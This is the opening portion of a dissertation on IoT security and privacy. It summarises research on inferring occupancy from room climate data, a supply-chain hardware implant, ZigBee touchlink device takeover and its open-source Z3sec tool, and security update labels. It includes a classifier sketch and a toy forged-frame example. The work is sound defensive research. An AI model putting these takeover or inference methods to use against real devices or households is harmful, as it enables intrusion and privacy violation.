Security and Privacy in the Internet of Things: Technical and Economic Perspectives

Sicherheit und Privatsphäre im Internet der Dinge: Technische und ökonomische Perspektiven

Submitted to the Faculty of Engineering of Friedrich-Alexander-Universität Erlangen-Nürnberg for the degree of

DOKTOR-INGENIEUR

submitted by

Philipp Morgner

Approved as a dissertation by the Faculty of Engineering of Friedrich-Alexander-Universität Erlangen-Nürnberg

Date of the oral examination: 31 May 2019
Chair of the doctoral committee: Prof. Dr.-Ing. Reinhard Lerch
Reviewer: Prof. Dr.-Ing. Felix Freiling
Reviewer: Prof. Dr. Christina Pöpper

Abstract

Over the last twenty years, the Internet has been extending from the digital sphere into the physical world through applications such as smart homes, smart cities, and Industry 4.0. Although this technological revolution of the Internet of Things (IoT) brings many benefits to its users, such as increased energy efficiency, optimized and automated processes, and enhanced comfort, it also introduces new security and privacy concerns.

In the first part of this thesis, we examine three novel IoT security and privacy threats from a technical perspective. As the first threat, we investigate privacy risks arising from the collection of room climate measurements in smart heating applications. We assume that an attacker has access to temperature and relative humidity data, and trains machine learning classifiers to predict the presence of occupants as well as to discriminate between different types of activities. The results show that the leakage of room climate data has serious privacy implications. As the second threat, we examine how the expansion of wide-area IoT infrastructure facilitates new attack vectors in hardware security. In particular, we explore to which extent malicious product modifications in the supply chain allow attackers to take control over these devices after deployment. To this end, we design and build a malicious IoT implant that can be inserted into arbitrary electronic products. In the evaluation, we leverage these implants for hardware-level attacks on safety- and security-critical products. As the third threat, we analyze the security of ZigBee, a popular network standard for smart homes. We present novel attacks that make direct use of the standard's features, showing that one of its commissioning procedures is insecure by design. In the evaluation of these vulnerabilities, we reveal that attackers are able to eavesdrop on key material as well as take over ZigBee products and networks from a distance of more than 100 meters.

In the second part of this thesis, we investigate how IoT security can be improved. Based on an analysis of the root causes of ZigBee's security vulnerabilities, we learn that economic considerations influenced the security design of this IoT technology. Consumers are currently not able to reward IoT security measures, as an asymmetric information barrier prevents them from assessing the level of security that is provided by IoT products. As a result, manufacturers are not willing to invest in comprehensive security designs because consumers cannot distinguish them from insufficient security measures. To tackle the asymmetric information barrier, we propose so-called security update labels. Focusing on the delivery of security updates as an important aspect of enforcing IoT security, these labels transform the asymmetric information about the manufacturers' willingness to provide future security updates into an attribute that can be considered during buying decisions. To assess the influence of security update labels on consumers' choices, we conducted a user study with more than 1,400 participants. The results reveal that the proposed labels are intuitively understood by consumers, considerably influence their buying decisions, and therefore have the potential to establish incentives for manufacturers to provide sustainable security support.

Zusammenfassung

Over the last 20 years, the Internet has extended beyond the digital sphere into the physical world through applications such as smart homes, smart cities, and Industry 4.0. Although this so-called Internet of Things (IoT) brings many benefits to its users, such as optimized and automated processes, higher energy efficiency, and more comfort, it also leads to new challenges with respect to security and privacy.

In the first part of this thesis, three novel IoT threats are examined from a technical perspective. First, we analyze privacy risks that arise from the large-scale collection of room climate data in smart homes. Assuming an attacker who only has access to temperature and relative humidity measurements, we show that machine learning can be used to infer both the presence of occupants and individual activities. Second, we consider new attack vectors that emerge from the expansion of wide-area IoT infrastructure. In particular, we explore to which extent hardware manipulations of products in the supply chain allow attackers to later take control over these manipulated devices. To this end, we develop a malicious IoT implant that can be inserted into arbitrary electronic products. Third, we analyze the security of ZigBee, a widespread network standard for smart homes. Using attacks that merely exploit existing features of the standard, we demonstrate the insecurity of so-called touchlink commissioning, one of two possible commissioning procedures in this standard. The practical evaluation of these vulnerabilities shows that attackers are able to eavesdrop on key material and to take over ZigBee products, and potentially entire networks, from a distance of more than 100 meters.

In the second part of this thesis, approaches to improving security are investigated. A root cause analysis of ZigBee's security problems shows that economic decisions influenced its security design. Consumers are currently not able to assess the security level of an IoT product. As a consequence, manufacturers do not invest in strong security designs, since consumers cannot distinguish them from insufficient security mechanisms anyway. To break down this asymmetric information barrier, we propose so-called security update labels. These labels transform the asymmetric information about whether manufacturers will provide security updates in the future into comprehensible product attributes that can be taken into account in buying decisions. To demonstrate the influence of security update labels on consumer decisions, a user study with more than 1,400 participants was conducted. The results show that consumers intuitively understand and consider these labels. Consequently, these labels can create incentives for manufacturers to sustainably support the security of their IoT products.

Danksagung

This dissertation arose from the privilege of pursuing a doctorate at the Chair of IT Security Infrastructures at Friedrich-Alexander-Universität Erlangen-Nürnberg. Two people in particular played a decisive role in this success. First, Felix Freiling, who as head of the chair created an excellent working atmosphere in which my research ideas could become reality. Through his open ear and his personal commitment to staff and students, he is a role model for me. Second, Zinaida Benenson, who as my scientific advisor trained me to become a successful doctoral researcher. Through her competence and conscientious way of working, she taught me to understand and apply scientific methods, as well as to master the art of writing publications. I sincerely thank both of them for their extensive support!

Furthermore, I sincerely thank Christina Pöpper for her willingness to write the second review of this dissertation.

In the course of my research activities, I had the privilege of carrying out scientific projects with various researchers, doctoral candidates, and students. I would especially like to thank Frederik Armknecht and Christian Müller for the successful collaboration in the DFG project1 "Entwicklung und Anwendung eines fundierten Rahmenwerkes für Sicherheit in Sensornetzen". My further thanks go to Björn Eskofier, Matthias Ring, and Christian Riess for their expert support in the evaluation of room climate data using machine learning. Likewise, I thank Nicole Koschate-Fischer and Christoph Mai for their expert support in carrying out the user study on the security update labels. Moreover, I thank Stephan Mattejat, Stefan Pfennig, and Dennis Salzner for their work on joint publications. I thank Vincent Haupert, Paulo Martinez, Gaston Pugliese, Lena Reinfelder, and Theresa Rottmann for proofreading parts of this thesis.

My extended thanks go to my colleagues at the chair, both the scientific and the administrative staff, who with their active support and friendship gave me more than just a working environment. Last but not least, I thank my parents, siblings, and friends for their support on all my paths in life.

1 My employment was partly funded by the Deutsche Forschungsgemeinschaft (DFG).

Contents

1 Introduction ...... 1
1.1 Motivation ...... 1
1.2 Structure of Thesis ...... 2
1.3 Contributions ...... 3
1.3.1 Contributions of Part I: Technical Perspective ...... 3
1.3.2 Contributions of Part II: Economic Perspective ...... 5
1.4 Publications ...... 6

Technical Perspective

2 Background and Related Work ...... 13
2.1 Understanding the Internet of Things ...... 13
2.1.1 Application-Level Perspective ...... 14
2.1.2 System-Level Perspective ...... 17
2.1.3 Network-Level Perspective ...... 18
2.2 Threat Classification Taxonomy for the Internet of Things ...... 19
2.2.1 Threats of Information Leakage ...... 21
2.2.2 Threats of Connectivity Misuse ...... 23
2.2.3 Threats of Object Exploitation ...... 25

3 Privacy Implications of Room Climate Data ...... 31
3.1 Introduction ...... 32
3.2 Threat Model ...... 34
3.3 Experimental Design and Methods ...... 35
3.3.1 Experimental Setup and Tasks ...... 35
3.3.2 Sensor Data Collection ...... 37
3.3.3 Experimental Procedure ...... 38


3.3.4 Participants and Ethical Principles ...... 39
3.3.5 Classifier Design ...... 39
3.4 Results ...... 40
3.4.1 Visual Inspection ...... 40
3.4.2 Occupancy Detection ...... 42
3.4.3 Occupancy Estimation ...... 42
3.4.4 Activity Recognition ...... 43
3.4.5 Multi-Sensor Classification ...... 45
3.5 Further Observations ...... 46
3.5.1 Length of Measurement Windows ...... 47
3.5.2 Selected Features ...... 47
3.5.3 Size and Layout of Rooms ...... 48
3.5.4 Position of Sensors ...... 48
3.6 Discussion ...... 48
3.6.1 Privacy Implications ...... 49
3.6.2 Location-Independent Classification ...... 49
3.6.3 Policy Implications ...... 50
3.7 Related Work on Occupancy Detection and Activity Recognition ...... 51
3.8 Conclusion ...... 51

4 Malicious IoT Implants ...... 55
4.1 Introduction ...... 56
4.2 Preliminaries ...... 57
4.2.1 LPWAN Infrastructure ...... 57
4.2.2 Serial Communication ...... 58
4.2.3 I2C Communication Protocol ...... 61
4.3 Threat Model ...... 63
4.3.1 Untrusted Supply Chain ...... 63
4.3.2 Attacker Model ...... 64
4.4 Malicious IoT Implant ...... 65
4.4.1 Design Criteria ...... 65


4.4.2 Attack Procedures ...... 66
4.4.3 Implementation ...... 67
4.5 Evaluation ...... 68
4.5.1 Dimensions ...... 68
4.5.2 Power Consumption ...... 69
4.5.3 Wireless Range ...... 69
4.5.4 Cost ...... 69
4.5.5 Effort of Insertion ...... 69
4.5.6 Feasibility of Attacks ...... 70
4.6 Discussion ...... 73
4.6.1 Limitations ...... 74
4.6.2 Countermeasures ...... 74
4.7 Related Work on Malicious Hardware ...... 76
4.8 Conclusion ...... 77

5 Insecurity of ZigBee Touchlink Commissioning ...... 79
5.1 Introduction ...... 79
5.2 Background on ZigBee ...... 81
5.2.1 System Model ...... 82
5.2.2 Security ...... 82
5.2.3 Commissioning ...... 83
5.3 Threat Model ...... 84
5.3.1 Security Goals and Attacker Model ...... 84
5.3.2 Threat Scenarios ...... 85
5.4 Security Analysis of Touchlink Commissioning ...... 86
5.4.1 Penetration Testing Framework Z3sec ...... 87
5.4.2 Testbed ...... 87
5.4.3 Denial-of-Service Attacks ...... 89
5.4.4 Attacks to Gain Control ...... 92
5.4.5 Evaluation of Wireless Range ...... 94
5.4.6 Recovery ...... 96


5.5 Disclosure and Response ...... 97
5.6 Discussion ...... 98
5.7 Related Work on ZigBee Security ...... 100
5.8 Conclusion ...... 101

Economic Perspective

6 Root Cause Analysis of ZigBee's Insecurity ...... 105
6.1 Introduction ...... 105
6.2 Background on ZigBee ...... 106
6.3 Root Cause Analysis ...... 107
6.3.1 Motivation for Standardization ...... 108
6.3.2 ZigBee as Case Study on Security Economics ...... 109
6.4 Implications of Insecure IoT Products ...... 111
6.5 A Road to Improvement ...... 112
6.5.1 Define Precise Security Models ...... 112
6.5.2 Stop Consumer and Business Security Differentiation ...... 112
6.5.3 Add Membership Level for Academic Institutes ...... 113
6.5.4 Conduct Security Testing Without Conflict of Interest ...... 113
6.5.5 Define and Enforce Update Policy ...... 114
6.6 Related Work on Security Economics in IoT Standardization ...... 114
6.7 Conclusion ...... 115

7 Security Update Labels ...... 117
7.1 Introduction ...... 118
7.2 Background and Related Work ...... 120
7.2.1 Product Labeling ...... 120
7.2.2 Security & Privacy Labels and Regulatory Approaches ...... 121
7.2.3 Conjoint Analysis ...... 122
7.3 Security Labels for Consumers ...... 122
7.3.1 Security Scales for Labeling ...... 123


7.3.2 Security Update Labels ...... 123
7.3.3 An Idea for a Regulatory Framework ...... 124
7.3.4 Concerns towards Security Update Labels ...... 125
7.4 Concept of User Study ...... 126
7.5 Preliminary Studies ...... 128
7.5.1 Prestudy 1: Selection of Product Categories ...... 128
7.5.2 Prestudy 2: Definition of Product Attributes and Levels ...... 132
7.6 Conjoint Analysis ...... 136
7.6.1 Method ...... 136
7.6.2 Pilot Study ...... 138
7.6.3 Sample Size ...... 139
7.6.4 Sample Characteristics ...... 139
7.6.5 Results ...... 139
7.6.6 Validity ...... 142
7.6.7 Segmentation ...... 145
7.7 Discussion ...... 147
7.8 Conclusion ...... 149

8 Conclusion and Future Work ...... 151

Bibliography ...... 153

Chapter 1

Introduction

In 1999, Kevin Ashton coined the term 'Internet of Things' [16]. This slogan was the headline of a marketing presentation that promoted his idea of utilizing radio-frequency identification (RFID) in supply chains. Now, twenty years later, this simple idea has evolved into a major technological paradigm in which plenty of other technologies have absorbed Ashton's idea and expedited his vision: Everyday items, household appliances, and mobile devices are interconnected via wireless networks and over the Internet. Industrial production machines communicate seamlessly with each other, and the deployment of sensors across large urban areas is promoted to achieve smart city environments.

1.1 Motivation

According to Gartner's prediction [99], the installed base of IoT devices will globally reach 20.4 billion units in 2020. The majority of these IoT devices, 12.9 billion units, is predicted to be installed in the consumer sector. Hence, IoT consumer products play a prominent role in the expansion of the IoT ecosystem. User surveys [322, 199] about concerns regarding the installation of IoT products in private spaces conclude that security is one of consumers' major concerns. These reservations are fostered by almost daily headlines about recently revealed security flaws and incidents concerning IoT products. Recently disclosed security issues in IoT consumer products range from unsecured data transmissions [252, 213], leaked master keys [337], and unsecured backends [54, 12, 107] to insufficient physical security mechanisms [213], over-privileged applications [91, 107], hard-coded credentials [54], and implementation bugs [248, 230, 123].

In general, the IoT combines security challenges from the domains of software, hardware, the Internet, low-power systems, and wireless systems. As the Internet extends into the physical world, the combination of these security challenges can have severe effects on the physical safety of living beings and critical infrastructure. Furthermore, the IoT collects extensive amounts of sensor data within the physical world to enable 'smart' functionality of IoT applications. However, this data collection raises massive privacy concerns. Often, consumers cannot determine how their data is used, as the data collection and processing lacks transparency on the part of smart service providers and manufacturers.

Numerous technical solutions and frameworks (e.g., [30, 92, 206, 265, 153, 306]) have been proposed to mitigate security and privacy threats in the IoT ecosystem. However, we expect that the spillover of academic security research into real-world IoT products is going to be slow or will not happen at all. Especially in the domain of IoT consumer products, manufacturers seem to be reluctant to adopt these solutions.

We believe that further research in technical security solutions alone will not lead to substantial improvements in the security of IoT consumer products. In fact, IoT security can only be enhanced by considering the business goals of the manufacturers and creating economic incentives for applying stronger security measures. From our point of view, an asymmetric information barrier exists, as consumers are not able to determine the level of security that is provided by an IoT consumer product. As a consequence, consumers do not reward security, and thus, manufacturers do not invest in such measures. Because of their finite resources, manufacturers invest time and effort into product features that are rewarded by consumers, e.g., new functions and being first on the market [9, 11]. Hence, security in IoT consumer products is only considered a non-functional feature with an unimportant role in the consumer's choice.

The objectives of this work are to investigate security and privacy threats within the IoT as well as to propose an approach that fosters sustainable IoT security efforts. We start with the examination of new threats that relate to the IoT ecosystem. Based on a root cause analysis of one of these IoT threats, we then introduce the concept of security update labels. These labels enable consumers to assess and compare, during buying decisions, for how long manufacturers guarantee to provide security updates. At the end, we empirically investigate the effects of the security update labels on the consumers' choice.

In the following sections of this chapter, we outline the structure and contributions of this thesis, and present the publications that are incorporated in this work.

1.2 Structure of Thesis

As illustrated in Figure 1.1, this thesis consists of two parts that complement each other: The first part, which comprises Chapters 2 to 5, focuses on security and privacy in the IoT from a technical perspective. The second part, which comprises Chapters 6 and 7, investigates our approach to strengthen IoT security from an economic perspective. In Chapter 2, we present background and related work. The related work is presented in the form of a threat classification taxonomy that classifies IoT threats into three categories. For each category, we present a case study in a subsequent chapter: In Chapter 3, we look at the threat of information leakage by presenting a case study on privacy implications of room climate data. In Chapter 4, we explore the threat of connectivity misuse by investigating whether public IoT infrastructure can be used to command and control malicious hardware elements. In Chapter 5, we outline the threat of object exploitation by analyzing the security mechanisms of the popular smart home network standard ZigBee. In Chapter 6, we analyze economically motivated root causes for the security vulnerabilities in the ZigBee standard. Finally, we propose and empirically investigate the idea of the security update labels in Chapter 7. We conclude this thesis and outline future work in Chapter 8.


Figure 1.1: Structure of thesis.

1.3 Contributions

The contributions of this thesis are multi-fold and interdisciplinary. Projects incorporated in this work have been conducted in cooperation with researchers from the domains of cryptography, sports informatics, machine learning, marketing research, and psychology. Our contributions regarding IoT security and privacy comprise both a detailed technical exploration of novel IoT threats and a potential solution that establishes economic incentives for manufacturers to provide security updates.

1.3.1 Contributions of Part I: Technical Perspective

In the first part of this thesis, we focus on the technical side and introduce a classification taxonomy for threats in the IoT ecosystem. For each class of threats, we elaborate with a case study that includes experiments or software and hardware implementations.


In detail, we identify the contributions of the first part of this thesis as the following:

Exploration of Novel IoT Threats. We investigated IoT systems from different applications and scenarios to learn about IoT-specific threats. We extend the current state of knowledge by evaluating the threats listed below with systematic methods. The overall goal is to raise awareness of the feasibility of these attacks.

1. Privacy Threats. In Chapter 3, we empirically investigated the long-held belief that information concerning the presence and activities of occupants can be extracted from room climate data. For this, we implemented a machine learning pipeline and conducted experiments with human subjects. The results showed that we can distinguish whether none, one, or two persons are present in a room. Furthermore, we can discriminate between the activities of reading, standing, walking, and working on a PC. Thus, we provide evidence that even the leakage of such 'unsuspicious' data as temperature and relative humidity can lead to privacy violations. (A minimal sketch of such a classification pipeline follows this list.)

2. Physical-Level Attacks Using Malicious Hardware. In Chapter 4, we introduce malicious IoT implants, showing that IoT infrastructures can be abused as an out-of-band communication channel for malicious hardware. Although the existence of malicious hardware implants is known [13], we are the first in the academic security community to design and build a low-cost IoT-connected implant. The feasibility of this threat is demonstrated by inserting the implant into exemplary safety- and security-critical target devices. To enable tampering with the target device, the implant exploits insecurities at the physical level in the serial communication between sensors, memory chips, and processors. We focused on the widely adopted I2C serial communication standard, as a market analysis showed that it has the highest support among 32-bit microcontrollers. We presented four attack procedures in which the malicious IoT implant directly interferes with the communication on I2C buses. We described the process of implant insertion in detail and evaluated real-world constraints such as size, cost, and energy consumption.

3. Wireless Network-Level Attacks. In Chapter 5, we provided a comprehensive security analysis of a popular wireless IoT standard that is used for smart home applications. More specifically, we analyzed the specifications of the ZigBee touchlink commissioning procedure and learned that the touchlink communication relies on inter-PAN frames, which are neither secured nor authenticated. Furthermore, we identified that the proximity check between a ZigBee device and a ZigBee controller relies only on the signal strength. Exploiting these weaknesses in the ZigBee standard, we demonstrated that a passive eavesdropper can extract key material from a distance of 130 meters. Moreover, we showed that an active attacker is able to take over IoT objects from a distance of 190 meters. We concluded that a single touchlink-enabled device is sufficient to compromise the security of a ZigBee network, and therefore, touchlink commissioning should not be supported in future ZigBee products. We disclosed our results to the manufacturers Philips, Osram, GE, and IKEA as well as to the ZigBee Alliance. As a result of our disclosure, products by Osram and IKEA received security patches that reduced the security risks for consumers.
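To give an impression of the kind of analysis behind the first contribution, the following minimal sketch trains an occupancy classifier on windowed temperature and humidity statistics. It is an illustration under assumed inputs only: the file name, column names, window length, and choice of a random forest are placeholders and not the actual configuration used in Chapter 3.

```python
# Minimal sketch: occupancy detection from room climate measurements.
# Assumptions (not the study's actual setup): a CSV file with columns
# 'temperature', 'humidity', and 'occupants', sampled at a fixed rate,
# and a window length of 120 samples.
import numpy as np
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_val_score

WINDOW = 120  # samples per measurement window (illustrative)

def windowed_features(df: pd.DataFrame):
    """Split the time series into windows and compute simple statistics."""
    X, y = [], []
    for start in range(0, len(df) - WINDOW, WINDOW):
        win = df.iloc[start:start + WINDOW]
        feats = []
        for col in ("temperature", "humidity"):
            series = win[col].to_numpy()
            feats += [series.mean(), series.std(),
                      series.max() - series.min(),   # range within the window
                      np.mean(np.diff(series))]      # average slope
        X.append(feats)
        y.append(win["occupants"].mode().iloc[0])    # window label (0, 1, 2 persons)
    return np.array(X), np.array(y)

df = pd.read_csv("room_climate.csv")                 # hypothetical input file
X, y = windowed_features(df)
clf = RandomForestClassifier(n_estimators=100, random_state=0)
print("cross-validated accuracy:", cross_val_score(clf, X, y, cv=5).mean())
```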

Release of Open-Source Tools and Data. In the course of our work, we published open-source tools and data for further use by the academic community. These materials can be used for teaching and research purposes.

1. Room Climate Data Sets. For the experiments presented in Chapter 3, we collected more than 115 hours of room climate data in controlled environments with multiple sensors at three locations. This collection of fine-grained room climate data is labeled with the ground truth about the presence and activities of occupants and has been released as an open data set on GitHub1. The release of these data sets is intended to support researchers who further investigate privacy implications of room climate data.

2. Z3sec ZigBee Penetration Testing Tool. For the security analysis of ZigBee products described in Chapter 5, we developed and released the open-source penetration testing framework Z3sec. This software allows the generation of arbitrary touchlink commands and provides an interface to take over and control ZigBee-certified IoT objects. Z3sec is available as an open-source project on GitHub2 and can be used for future ZigBee security research.
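As a rough illustration of the weakness exploited in Chapter 5, the following self-contained sketch packs a simplified, touchlink-style scan request. The field layout is deliberately simplified and does not reproduce the exact ZigBee inter-PAN frame format; for real experiments, the released Z3sec framework should be used.

```python
# Simplified sketch of an unauthenticated touchlink-style scan request.
# The layout below is NOT the exact ZigBee inter-PAN frame format; it only
# illustrates that nothing in such a frame is cryptographically bound to a
# legitimate sender.
import os
import struct

def build_scan_request(transaction_id=None):
    """Pack a toy 'scan request' payload that an attacker could forge at will."""
    if transaction_id is None:
        transaction_id = struct.unpack("<I", os.urandom(4))[0]
    frame_control = 0x0B   # placeholder inter-PAN frame control value
    zigbee_info = 0x12     # placeholder capability bits
    touchlink_info = 0x01  # placeholder 'scan over all channels' flag
    # '<BIBB': frame control, 32-bit transaction identifier, two info fields.
    return struct.pack("<BIBB", frame_control, transaction_id,
                       zigbee_info, touchlink_info)

print(build_scan_request().hex())
# Because no field depends on a secret key, a receiver cannot distinguish this
# forged request from one sent by a legitimate controller; the standard's only
# 'proximity check' is the received signal strength.
```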

1.3.2 Contributions of Part II: Economic Perspective

In the second part of this thesis, we present a solution for the rising threat of insecure IoT objects. Here, we especially focus on IoT consumer products, as these products contribute a large portion of the overall base of installed IoT objects. In our approach, we investigate how economic incentives can be established that could motivate manufacturers to invest more effort into sustainable security. In detail, the contributions of the second part of this thesis are as follows:

Root Cause Analysis of Insecure IoT Standardization. In the aftermath of the responsible disclosure concerning security vulnerabilities in ZigBee products, we had discussions with affected manufacturers and the ZigBee Alliance. Based on these discussions and further research about the economic motivations for standardization, we analyzed root causes that led to the insufficient security architecture of this particular ZigBee application standard (cf. Chapter 5). We summarized the security trade-offs made in these IoT specifications and provided recommendations on how to strengthen security architectures in future IoT standardization efforts.

1 https://github.com/IoTsec/Room-Climate-Datasets 2 https://github.com/IoTsec/Z3sec


Proposal of Labels to Strengthen Security of IoT Consumer Products. In Chapter 7, we proposed security update labels as a way to enable an informed consumer choice regarding security properties of IoT consumer products. More precisely, our proposal transforms the asymmetric information about the manufacturer's willingness to provide security updates into an intuitively assessable and comparable feature. This contribution is important because economic incentives for security patching are sought, e.g., by the US Departments of Commerce and Homeland Security [285], but, to the best of our knowledge, no practical solution has been established yet.

Empirical User Study on Security Update Guarantees. Additionally, in Chapter 7, we empirically examined the impact of guaranteed security patches on consumers' choices of IoT consumer products. This is important because security patching is discussed by experts as one of the most effective countermeasures against insecure IoT devices, while the consumers' acceptance of promised security updates has, to the best of our knowledge, never been comprehensively assessed. The results revealed that the availability of security updates is a very important factor in buying decisions. The importance, however, depends on consumers' perceived security risk towards the particular product category.
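For readers unfamiliar with conjoint analysis, the sketch below shows one common way to derive the relative importance of product attributes from estimated part-worth utilities. All attribute levels and utility values are invented for illustration and are not results of the study reported in Chapter 7.

```python
# Illustrative computation of relative attribute importance from part-worth
# utilities, as commonly done in conjoint analysis. The values below are
# invented and are NOT results of the user study described in Chapter 7.
part_worths = {
    "price":                 {"low": 0.8, "medium": 0.1, "high": -0.9},
    "brand":                 {"well-known": 0.3, "unknown": -0.3},
    "security update label": {"updates guaranteed": 0.7, "no guarantee": -0.7},
}

# Importance of an attribute = its utility range, normalized over all attributes.
ranges = {attr: max(u.values()) - min(u.values()) for attr, u in part_worths.items()}
total = sum(ranges.values())

for attr, rng in ranges.items():
    print(f"{attr:>24}: {100 * rng / total:5.1f} % relative importance")
```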

1.4 Publications

During the work on this thesis, a number of articles were published at academic conferences and workshops, as well as in an academic journal. This thesis is based on the publications that are listed in the following. The publications are sorted by type and then listed in chronological order of their date of publication.

Journal Article

[15] F. Armknecht, Z. Benenson, P. Morgner, C. Müller, and C. Riess3, "Privacy implications of room climate data," Journal of Computer Security, vol. 27, no. 1, pp. 113–136, 2019. [Online]. Available: https://content.iospress.com/articles/journal-of-computer-security/jcs181133

3 Authors sorted alphabetically

Articles in Conference and Workshop Proceedings

[213] P. Morgner, S. Mattejat, Z. Benenson, C. Müller, and F. Armknecht, "Insecure to the touch: Attacking ZigBee 3.0 via touchlink commissioning," in Proceedings of the 10th ACM Conference on Security and Privacy in Wireless and Mobile Networks, WiSec 2017, Boston, MA, USA, July 18-20, 2017, G. Noubir, M. Conti, and S. K. Kasera, Eds. ACM, 2017, pp. 230–240. [Online]. Available: http://doi.acm.org/10.1145/3098243.3098254

[214] P. Morgner, C. Müller, M. Ring, B. Eskofier, C. Riess, F. Armknecht, and Z. Benenson, "Privacy implications of room climate data," in Computer Security - ESORICS 2017 - 22nd European Symposium on Research in Computer Security, Oslo, Norway, September 11-15, 2017, Proceedings, Part II, ser. Lecture Notes in Computer Science, S. N. Foley, D. Gollmann, and E. Snekkenes, Eds., vol. 10493. Springer, 2017, pp. 324–343. [Online]. Available: https://doi.org/10.1007/978-3-319-66399-9_18

[208] P. Morgner and Z. Benenson, "Exploring security economics in IoT standardization efforts," in Proceedings of the NDSS Workshop on Decentralized IoT Security and Standards, DISS'18, San Diego, CA, USA, February 18, 2018, 2018. [Online]. Available: http://wp.internetsociety.org/ndss/wp-content/uploads/sites/25/2018/07/diss2018_9_Morgner_paper.pdf

[210] P. Morgner, F. Freiling, and Z. Benenson, "Opinion: Security lifetime labels - Overcoming information asymmetry in security of IoT consumer products," in Proceedings of the 11th ACM Conference on Security & Privacy in Wireless and Mobile Networks, WiSec 2018, Stockholm, Sweden, June 18-20, 2018, P. Papadimitratos, K. Butler, and C. Pöpper, Eds. ACM, 2018, pp. 208–211. [Online]. Available: http://doi.acm.org/10.1145/3212480.3212486

[215] P. Morgner, S. Pfennig, D. Salzner, and Z. Benenson, "Malicious IoT implants: Tampering with serial communication over the Internet," in Research in Attacks, Intrusions, and Defenses - 21st International Symposium, RAID 2018, Heraklion, Crete, Greece, September 10-12, 2018, Proceedings, ser. Lecture Notes in Computer Science, M. Bailey, T. Holz, M. Stamatogiannakis, and S. Ioannidis, Eds., vol. 11050. Springer, 2018, pp. 535–555. [Online]. Available: https://doi.org/10.1007/978-3-030-00470-5_25

[211] P. Morgner, C. Mai, N. Koschate-Fischer, F. Freiling, and Z. Benenson, "Security update labels: Establishing economic incentives for security patching of IoT consumer products," to appear in the Proceedings of the IEEE Symposium on Security and Privacy (S&P), May 2020. IEEE Computer Society, 2020.

Technical Report

[212] P. Morgner, S. Mattejat, and Z. Benenson, "All your bulbs are belong to us: Investigating the current state of security in connected lighting systems," CoRR, vol. abs/1608.03732, 2016. [Online]. Available: http://arxiv.org/abs/1608.03732


These publications are incorporated into this thesis as follows:

• Chapter 3 is based on the conference publication "Privacy Implications of Room Climate Data" [214]. Additionally, an extended version of this publication was published as a journal article [15]. These publications are joint work with colleagues from the digital sports group4 at the Friedrich-Alexander-Universität Erlangen-Nürnberg, Germany, led by Björn Eskofier, the multimedia security group at the Friedrich-Alexander-Universität Erlangen-Nürnberg, Germany, led by Christian Riess, and the cryptographic research group5 led by Frederik Armknecht at the University of Mannheim, Germany. The author of this thesis coordinated the research project with the involved parties. He developed the main concept of the study in cooperation with Zinaida Benenson, applied for the approval from the data protection office, collected data at one of three locations, and evaluated the gathered sensor data under the guidance of Matthias Ring, Björn Eskofier, and Christian Riess. Further data was collected at two other locations under the supervision of Christian Müller. The author of this thesis contributed large parts of the paper, which were iteratively improved by the other authors and himself.

• Chapter 4 is based on the conference publication "Malicious IoT Implants: Tampering with Serial Communication over the Internet" [215]. This publication is main-authored by the author of this thesis and reports the results of the master's theses by Dennis Salzner [254] and Stefan Pfennig [234]. The author of this thesis drafted the idea of leveraging IoT infrastructure for hardware attacks. Dennis Salzner conducted exploratory research on vulnerabilities of the I2C standard. Stefan Pfennig implemented the malicious IoT implants, which were evaluated in cooperation with the author of this thesis.

• Chapter 5 is based on the conference publication "Insecure to the Touch: Attacking ZigBee 3.0 via Touchlink Commissioning" [213]. A preliminary version of this paper was published as a technical report under the title "All Your Bulbs Are Belong to Us: Investigating the Current State of Security in Connected Lighting Systems" [212]. These publications are main-authored by the author of this thesis and report the results of the bachelor thesis by Stephan Mattejat [198], who implemented the Z3sec penetration testing framework. The security vulnerabilities of ZigBee were evaluated by Stephan Mattejat in cooperation with the author of this thesis. Zinaida Benenson helped with the conceptualization of the research results.

• Chapter 6 is based on the workshop publication “Exploring Security Economics in IoT Standardization Efforts” [208]. This publication is main-authored by the author of this thesis and reports findings learned by Zinaida Benenson and the author of this thesis

4 Now: Machine Learning and Data Analytics Lab at the Friedrich-Alexander-Universität Erlangen-Nürnberg, Germany
5 Now: Chair of Practical Computer Science IV: Dependable Systems Engineering at the University of Mannheim, Germany


in the aftermath of a responsible disclosure of vulnerabilities in IoT consumer products to their respective manufacturers and the affected standard-defining organization.

• Chapter 7 is based on the conference publication "Opinion: Security Lifetime Labels – Overcoming Information Asymmetry in Security of IoT Consumer Products" [210], which was extended with an empirical user study in the conference publication "Security Update Labels: Establishing Economic Incentives for Security Patching of IoT Consumer Products" [211]. The latter publication was joint work with colleagues from the GfK-Chair of Marketing Intelligence led by Nicole Koschate-Fischer at the Friedrich-Alexander-Universität Erlangen-Nürnberg, Germany. Excerpts of both publications are also used in Chapter 1 to motivate the topic of the thesis. The author of this thesis was the initiator and coordinator of the project. He drafted the idea of the security update labels, which he discussed with Felix Freiling and Zinaida Benenson. The author of this thesis applied for the approval from the data protection office and conducted the empirical user study in coordination with Christoph Mai. Furthermore, he main-authored the publication, which was enhanced under the guidance of Zinaida Benenson. The definition of the experimental setup as well as the empirical analysis of the user study was supported by Zinaida Benenson, Christoph Mai, and Nicole Koschate-Fischer.
• Excerpts from the abstracts of [210, 211, 213, 214, 215] are included in the abstract of this thesis.

Further Publications. In addition to the above-listed publications, the author of this thesis has also authored and contributed to further publications, which are not incorporated in this thesis:

[209] P. Morgner, Z. Benenson, C. Müller, and F. Armknecht, "Design space of smart home networks from a security perspective," in Proceedings of the 14. GI/ITG KuVS Fachgespräch Sensornetze (FGSN 2015), Erlangen, Germany, September 23-24, 2015, 2015, pp. 41–44. [Online]. Available: https://core.ac.uk/download/pdf/86433152.pdf
[14] F. Armknecht, Z. Benenson, P. Morgner, and C. Müller6, "On the security of the ZigBee light link touchlink commissioning procedure," in International Workshop on Security, Privacy and Reliability of Smart Buildings, 2016, pp. 229–240. [Online]. Available: https://dl.gi.de/20.500.12116/874

6 Authors sorted alphabetically


Part I

Technical Perspective

Chapter 2

Background and Related Work

The IoT represents the expansion of the Internet from the digital into the physical sphere. In this evolution, security is one of the most crucial requirements. However, the selection of suitable security measures is not trivial and requires in-depth knowledge about threats that could affect IoT systems. In this chapter, we present background and related work in the form of a taxonomy for IoT security threats. We extend this taxonomy with case studies in the subsequent three chapters. The objective is to gain a comprehensive understanding of the IoT threat landscape.

Contents

2.1 Understanding the Internet of Things ...... 13
2.1.1 Application-Level Perspective ...... 14
2.1.2 System-Level Perspective ...... 17
2.1.3 Network-Level Perspective ...... 18
